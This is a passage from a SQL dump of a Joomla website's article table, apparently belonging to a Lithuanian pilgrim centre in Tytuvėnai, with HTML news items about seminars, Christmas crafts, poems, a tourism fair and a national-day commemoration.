įmonė</em></em></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"42\">\r\n<p align=\"center\"><em>6.</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"229\">\r\n<p align=\"center\"><em>Renginių organizatorius</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"76\">\r\n<p align=\"center\"><em>1</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"147\">\r\n<p align=\"center\"><em><em>*</em></em></p>\r\n</td>\r\n<td valign=\"top\" width=\"162\">\r\n<p align=\"center\"><em><em>*</em></em></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"42\">\r\n<p align=\"center\"><em>7.</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"229\">\r\n<p align=\"center\"><em>Pagalbinis darbininkas-kūrikas</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"76\">\r\n<p align=\"center\"><em>2</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"147\">\r\n<p align=\"center\"><em><em>*</em></em></p>\r\n</td>\r\n<td valign=\"top\" width=\"162\">\r\n<p align=\"center\"><em><em>*</em></em></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><em><strong> </strong></em></p>\r\n<p style=\"text-align: justify;\"><em>* Vadovaujantis Lietuvos Respublikos Vyriausybės 2003 m. balandžio 18 d. nutarimu Nr. 480  patvirtino Bendrųjų reikalavimų valstybės ir savivaldybių institucijų ir įstaigų interneto svetainėms aprašo III skyriaus 18 punktu, praėjusių metų vidutinis mėnesinis bruto darbo užmokestis ir einamųjų metų praėjusio ketvirčio vidutinis mėnesinis bruto darbo užmokestis nepateikiamas.</em></p>','',1,0,0,53,'2013-03-06 19:50:00',135,'','2018-06-12 11:53:35',135,0,'0000-00-00 00:00:00','2013-03-06 19:50:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',17,0,7,'','',1,9826,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(216,304,'Kaip teisingai valgyti?','kaip-teisingai-valgyti-kad-butume-sveiki-grazus-ir-energingi','','<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kviečiame į seminarą! Kaip teisingai valgyti, kad būtume sveiki, gražūs ir energingi?</span></p>\r\n','\r\n<p> </p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/teisingas_maistas/skelbimas_teisingas_maistas.png\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2014-12-11 13:37:25',135,'','2014-12-11 13:37:54',135,0,'0000-00-00 00:00:00','2014-12-11 13:37:25','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/teisingas_maistas\\/teisingas_maistas.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,155,'','',1,3401,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(217,305,'Edukacinė pamoka. KALĖDŲ ŽVAIGŽDĖ','edukacine-pamoka-kaledu-zvaigzde','','<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Edukacinė pamoka. KALĖDŲ ŽVAIGŽDĖ</span></p>\r\n','\r\n<p> </p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/kaledu_zvaizde/kaledu_zvaigzde.jpg\" border=\"0\" width=\"547\" height=\"800\" /></span></p>',1,0,0,44,'2014-12-11 13:44:57',135,'','2014-12-11 13:45:41',135,0,'0000-00-00 00:00:00','2014-12-11 13:44:57','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kaledu_zvaizde\\/kaledu_zvaigzde_logo.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,154,'','',1,3520,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(218,306,'Edukacinė  pamokėlė “Kalėdų žvaigždė\"','edukacine-pamokele-kaledu-zvaigzde','','<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Jau eilę metų Tytuvėnų kultūros centro jaunieji šokėjai ir gimnazijos maironiečiai prieš Kalėdų šventes lanko vienišus ir senus miestelio žmones. Kaip ir dera  į svečius einama ne tuščiomis rankomis - vaikai dovanoja pačių pagamintas dovanėles. </span></p>\r\n','\r\n<p>{gallery cols=5 orientation=horizontal width=166}stories/naujienos/kaledu_zvaizde/new{/gallery}</p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">Geroji žemele,<br />Parodyk man kelią<br />Į šviesią ir tyrą<br />Kalėdų žvaigždelę.<br /><br />Kai niekas nemato,<br />Kai niekas negirdi,<br />Kai angelas basas<br />Ateina į širdį.<br /><br />Ateina į širdį<br />Tik vaikiškai tyrą.<br />Balti žiedlapėliai<br />Ant delno pabyra.<br /><br />Balti žiedlapėliai<br />Parodys tau kelią<br />Į nuostabiai tyrą<br />Kalėdų žvaigždelę.<br /><br /></span></p>\r\n<p style=\"text-align: justify;\"><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">Šiemet buvo nuspręsta, kad kalėdinė dovanėlė bus papuošta žvaigždele suverta iš rugio šiaudo, tai sena tradicija Lietuvoje  Advento laike varstyti iš šiaudelių žaisliukus, kuriais Kūčių dienoje bus puošiama eglutė.</span></p>\r\n<p style=\"text-align: justify;\"><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\">Tylų Advento vakarą, susirinkę senojo Tytuvėnų bernardinų vienuolyno bibliotekos salėje vaikai ir mokytojos apžiūrėjo šiaudinukus - žvaigždes, paukštukus, varpelius, girliandas. Tytuvėnų piligrimų centras vaikams dovanojo edukacinę  pamokėlę “Kalėdų žvaigždė”. Džiugu, kad ši idėja  susieiti  ir prisiminti senuosius šventėms ruošimosi darbus tampa gražia tradicija, kad visi kartu randame būdų kaip nudžiuginti artimą dalinantis kūryba, dvasine šiluma ir gerumo dovanomis.<br /></span></p>',1,0,0,44,'2014-12-16 10:43:10',135,'','2014-12-16 10:47:00',135,0,'0000-00-00 00:00:00','2014-12-16 10:43:10','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kaledu_zvaizde\\/new\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,153,'','',1,3634,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(220,308,'Sveikiname Šv. Kalėdų ir naujųjų metų proga.','sveikiname-visus-sv-kaledu-ir-naujuju-metu-proga','','<p><span class=\"text_exposed_show\" style=\"color: #333333; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Sveikiname visus Šv. Kalėdų ir naujųjų metų proga.</span></p>\r\n','\r\n<p> </p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: Helvetica, Arial, \'lucida grande\', tahoma,\r\n      verdana, arial, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #ffffff;\"><img src=\"images/stories/naujienos/kaledos2014/sveikinimas.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2014-12-23 12:51:05',135,'','2014-12-23 12:51:17',135,135,'2014-12-23 12:51:17','2014-12-23 12:51:05','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kaledos2014\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,151,'','',1,3376,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(221,309,'Žiemos pasaka','ziemos-pasaka','','<p>Įspėk, kas kvepia? Neįspėjai.<br />Lelijos? Liepos? Vėjai? Ne.<br />Taip kvepia princai ir kirpėjai,<br />Taip kvepia vakaras sapne.</p>\r\n','\r\n<p>{gallery cols=5 orientation=horizontal width=166}stories/naujienos/ziemos_pasaka/new{/gallery} Žiūrėki: linija pro stiklą<br />Praėjo posūkiu tyliu,<br />Rami šviesa pro švelnią miglą<br />Čiurlena pieno upeliu.<br /><br />Žiūrėki: sninga, sninga, sninga.<br />Žiūrėki: baltas sodas minga.<br />Nugrimzdo žemė praeity.<br />Įspėk, kas eina? Neįspėjai:<br />Ateina princai ir kirpėjai,<br />Balti karaliai ir kepėjai,<br />Ir šlama medžiai apsnigti.<br />                          <br /><br />            Henrikas Radauskas</p>\r\n<p><img src=\"images/stories/naujienos/ziemos_pasaka/1-kaikas 282.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/ziemos_pasaka/1-kaikas 286.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/ziemos_pasaka/1-kaikas 287.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/ziemos_pasaka/1-kaikas 288.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/ziemos_pasaka/1-kaikas 289.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/ziemos_pasaka/1-kaikas 293.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/ziemos_pasaka/1-kaikas 312.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2014-12-30 12:38:03',135,'','2014-12-30 12:49:45',135,0,'0000-00-00 00:00:00','2014-12-30 12:38:03','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/ziemos_pasaka\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,150,'','',1,3524,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(222,310,'ADVENTUR\'2015','adventur-2015','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Š.m. sausio 23-25 d. VšĮ \"Tytuvėnų piligrimų centras\" kartu su Kelmės rajono savivaldybe, Tytuvėnų regioniniu parku, Kelmės dvaro muziejumi ir Kražių Kražių Motiejaus Kazimiero Sarbievijaus centru, pristatėme Kelmės kraštą Lietuvos keliautojams, kelionių organizatoriams, bei visiems lankytojams aplankiusiems parodą. </span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kiekvienas parodos dalyvis bandė pabrėžti savo krašto patrauklumą. Kelmės kraštas pristatė naujas edukacines programas, dviračių trasas, lankytinas vietas, aktyvų laisvalaikį.<span class=\"Apple-converted-space\"> </span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Jau antrus metus iš eilės rengėme loteriją be pralaimėjimo, kuri turėjo didelį pasisekimą tarp lankytojų. Lankytojai labai džiaugėsi galėję laimėti dovanų kuponą su nemokamu apsilankymu Kelmės krašto kultūros paveldo objektuose, edukacinėse programose. Dėkojame Kelmės pieninei, kuri paįvairino mūsų prizų fondą, bei suteikė galimybę apdovanoti daugiau parodos lankytojų. Dėkojame visiems kurie su mumis dalyvavo parodoje ir prisidėjo prie pasiruošimo jai.</span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Iki susitikimo kitais metais! :)</span></p>\r\n<p><img src=\"images/stories/naujienos/adventur2015/1.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/adventur2015/2.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/adventur2015/3.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/adventur2015/4.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p><img src=\"images/stories/naujienos/adventur2015/5.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2015-01-29 07:38:26',135,'','2015-01-29 07:43:57',135,0,'0000-00-00 00:00:00','2015-01-29 07:38:26','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/adventur2015\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,149,'','',1,4031,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(223,311,'Kvietimas','kvietimas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Š.m. vasario 15 d. kviečiame į renginį skirtą vasario 16 d. ir S. Riomerienės 130-ųjų gimimo metinių paminėjimui. Renginio metu bus pristatyta Sofijos Riomerienės bei ŠU studentų ir Kuršėnų Meno mokyklos moksleivių giliaspaudės grafikos darbų paroda.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Programa:<br />12.00 – Šv. Mišios Tytuvėnų bažnyčioje skirtos vasario 16 d. ir S. Riomerienės 130-ųjų gimimo metinių paminėjimui. <br />14.00 – Renginys skirtas vasario 16 d. atminimui ir S. Riomerienės grafikos darbų parodos atidarymas. <br />Renginys vyks Tytuvėnų vienuolyno refektorinėje salėje.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><strong>Organizatoriai:</strong><br />Tytuvėnų seniūnija,<br />VšĮ \"Tytuvėnų piligrimų centras\",<br />Tytuvėnų kultūros centras, <br />Tytuvėnų gimnazija, <br />VšĮ \"Tytuvėnų festivalis\".</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Dėl išsamesnės informacijos kreiptis tel.8 427 562 23, e.p. info@infotytuvenai.lt</span></p>\r\n<p><img src=\"images/stories/naujienos/uzmirsta_tytuvenams/uzmirsta_tytuvenams.jpg\" border=\"0\" /></p>',1,0,0,44,'2015-02-05 14:17:50',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2015-02-05 14:17:50','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/uzmirsta_tytuvenams\\/kvietimas2015.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,148,'','',1,3534,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(224,312,' Paminėtas Lietuvos valstybės gimtadienis','paminetas-lietuvos-valstybes-gimtadienis','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">120 metų Lietuvos vardo nebuvo Europos žemėlapyje. 1918 metų vasario 16 dienos Aktas paskelbė lietuvių tautos lūkesčius ir politinius siekius, tapo tautos laisvės ir suverenumo simboliu.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; 